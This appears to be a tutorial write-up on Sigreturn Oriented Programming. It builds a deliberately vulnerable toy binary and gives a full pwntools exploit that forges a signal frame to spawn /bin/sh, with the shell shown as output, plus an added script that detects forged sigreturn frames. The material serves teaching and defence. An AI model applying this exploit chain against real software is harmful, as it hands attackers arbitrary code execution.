SROP
Sigreturn Oriented Programming (SROP) is a novel technique for exploits and backdoors in UNIX-like systems. See [1] for details.
Vulnerable program
- The vuln program
```python
from pwn import *

context.arch = 'amd64'
context.os = 'linux'

# Build a tiny ELF whose entry point is a raw read() from stdin onto the stack.
# Linux zeroes rax at process entry, so the `syscall` here is
# read(0, rsp-8, 500): the read starts 8 bytes below rsp and overruns the
# slot that the following `ret` pops, handing over control of rip.
# `pop rax; ret` is the gadget used later to load the rt_sigreturn number.
elf = ELF.from_assembly(
    '''
    mov rdi, 0;
    mov rsi, rsp;
    sub rsi, 8;
    mov rdx, 500;
    syscall;
    ret;
    pop rax;
    ret;
    ''', vma=0x41000
)
elf.save('vuln')
```
```text
└─$ cat /usr/include/asm/unistd_64.h | grep -i sigreturn -A2
#define __NR_rt_sigreturn 15
#define __NR_ioctl 16
#define __NR_pread64 17
```
- Embed the shell string and find its address
```text
┌──(kali㉿kali)-[~/exploits/srop]
└─$ echo -en "/bin/sh\x00" >> vuln
┌──(kali㉿kali)-[~/exploits/srop]
└─$ strings -tx vuln |grep /bin/sh
1238 /bin/sh
```
pwn
- Inspect the gadgets
```text
$ objdump -d -M intel vuln

vuln: file format elf64-x86-64

Disassembly of section .shellcode:

0000000000041000 <__start>:
   41000: 48 c7 c7 00 00 00 00    mov rdi,0x0
   41007: 48 89 e6                mov rsi,rsp
   4100a: 48 83 ee 08             sub rsi,0x8
   4100e: 48 c7 c2 f4 01 00 00    mov rdx,0x1f4
   41015: 0f 05                   syscall
   41017: c3                      ret
   41018: 58                      pop rax
   41019: c3                      ret
```
- pwn
```python
from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)
p = process()

BINSH = elf.address + 0x1238  # file offset of the appended "/bin/sh" string
POP_RAX = 0x41018             # pop rax; ret
SYSCALL_RET = 0x41015         # syscall; ret

# Fake signal frame: when rt_sigreturn restores it, the registers hold the
# arguments of execve("/bin/sh", NULL, NULL) and rip lands on the syscall gadget.
frame = SigreturnFrame()
frame.rax = 0x3b        # syscall number for execve
frame.rdi = BINSH       # pointer to /bin/sh
frame.rsi = 0x0         # NULL
frame.rdx = 0x0         # NULL
frame.rip = SYSCALL_RET

payload = b'A' * 8            # fills rsp-8; the next qword overwrites the return slot
payload += p64(POP_RAX)
payload += p64(0xf)           # syscall number for rt_sigreturn
payload += p64(SYSCALL_RET)   # execute syscall instruction
payload += bytes(frame)       # the frame sits at rsp when the kernel reads it back
p.sendline(payload)
p.interactive()
```
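To see what the kernel is actually handed when this payload reaches rt_sigreturn, here is an added example (it is not part of the original post and not pwntools code) that decodes an x86-64 sigreturn frame and flags frames that look hand-built rather than written by the kernel during real signal delivery. The sample payload is constructed inline to mirror the script above; the `/bin/sh` address 0x41238 is an assumption (elf.address + 0x1238 for this binary). The field order and the 248-byte size are assumed to match pwntools' amd64 `SigreturnFrame`; cross-check against `bytes(SigreturnFrame())` where pwntools is installed.

```python
import struct

# 31 eight-byte little-endian fields, 248 bytes in total: uc_flags, uc_link,
# uc_stack, then the registers of struct sigcontext and the signal mask.
# Order and size are assumed to match pwntools' amd64 SigreturnFrame.
SIGFRAME_FIELDS = [
    "uc_flags", "&uc", "uc_stack.ss_sp", "uc_stack.ss_flags", "uc_stack.ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
    "eflags", "csgsfs", "err", "trapno", "oldmask", "cr2",
    "&fpstate", "__reserved", "sigmask",
]
FRAME_SIZE = 8 * len(SIGFRAME_FIELDS)  # 248

# x86-64 syscall numbers (unistd_64.h) that a forged frame usually aims at.
SUSPICIOUS_SYSCALLS = {0x3b: "execve", 0x142: "execveat", 0x0a: "mprotect", 0x09: "mmap"}


def decode_frame(blob):
    """Decode one sigreturn frame into {field: value}; needs FRAME_SIZE bytes."""
    if len(blob) < FRAME_SIZE:
        raise ValueError(f"need {FRAME_SIZE} bytes, got {len(blob)}")
    return dict(zip(SIGFRAME_FIELDS, struct.unpack("<31Q", blob[:FRAME_SIZE])))


def looks_like_srop_frame(frame):
    """Heuristic for a hand-built frame.

    A frame the kernel wrote during real signal delivery carries non-zero
    uc_link/fpstate pointers and an eflags value with reserved bit 1 set; a
    forged one is typically all zeros apart from cs=0x33 (user code segment),
    a syscall number in rax and the address of a syscall gadget in rip.
    """
    cs = frame["csgsfs"] & 0xFFFF
    return (
        cs == 0x33
        and frame["rax"] in SUSPICIOUS_SYSCALLS
        and frame["rip"] != 0
        and (frame["eflags"] & 0x2) == 0
        and frame["&uc"] == 0
        and frame["&fpstate"] == 0
    )


def scan_payload(data):
    """Slide an 8-byte-aligned window over the input and return
    (offset, syscall name, rip) for every window that decodes as a forged frame."""
    hits = []
    for off in range(0, len(data) - FRAME_SIZE + 1, 8):
        frame = decode_frame(data[off:off + FRAME_SIZE])
        if looks_like_srop_frame(frame):
            hits.append((off, SUSPICIOUS_SYSCALLS[frame["rax"]], frame["rip"]))
    return hits


def build_sample_frame(**regs):
    """Constructed test data, not a capture: a zeroed frame with cs=0x33 (as
    pwntools initialises it) plus the given field values."""
    frame = dict.fromkeys(SIGFRAME_FIELDS, 0)
    frame["csgsfs"] = 0x33
    frame.update(regs)
    return struct.pack("<31Q", *(frame[name] for name in SIGFRAME_FIELDS))


# Constructed stand-in for the input the exploit script above sends.
# 0x41238 is an assumed address for the appended "/bin/sh" string.
SAMPLE_PAYLOAD = (
    b"A" * 8
    + struct.pack("<Q", 0x41018)  # pop rax; ret
    + struct.pack("<Q", 0xF)      # rt_sigreturn
    + struct.pack("<Q", 0x41015)  # syscall; ret
    + build_sample_frame(rax=0x3B, rdi=0x41238, rip=0x41015)
)

# Constructed stand-in for a frame produced by genuine signal delivery:
# rax still holds a syscall number, but eflags/uc_link/fpstate are kernel-like.
BENIGN_FRAME = build_sample_frame(
    rax=0x3B, rip=0x401000, eflags=0x246,
    **{"&uc": 0x7FFD1000, "&fpstate": 0x7FFD1200},
)

if __name__ == "__main__":
    for off, name, rip in scan_payload(SAMPLE_PAYLOAD):
        print(f"forged frame at +{off}: rax -> {name}, rip=0x{rip:x}")
    print("benign frame flagged:", bool(scan_payload(BENIGN_FRAME)))
```

Running it reports the forged frame at offset 32 of the sample payload (after the 8 padding bytes and the three gadget addresses) with rax selecting execve, while the kernel-style frame is not flagged even though its rax also holds 0x3b. The eflags and pointer checks are what separate the two; a frame restored from a real signal always has eflags bit 1 set, so a zeroed eflags is a cheap tell when reviewing crash dumps or captured input.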
pwn success
```text
┌──(kali㉿kali)-[~/exploits/srop]
└─$ python exploit.py
[+] Starting local process '/home/kali/exploits/srop/vuln': pid 1960175
[*] Switching to interactive mode
$ who
kali pts/0 Feb 13 20:48 (192.168.44.1)
```
References
- Original author: winsun
- Original link: https://winsun.github.io/fightsec/post/pwn_06_srop/
- Copyright notice: This work is licensed under the Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. Non-commercial reproduction must credit the source (author and original link); for commercial reproduction, contact the author for permission.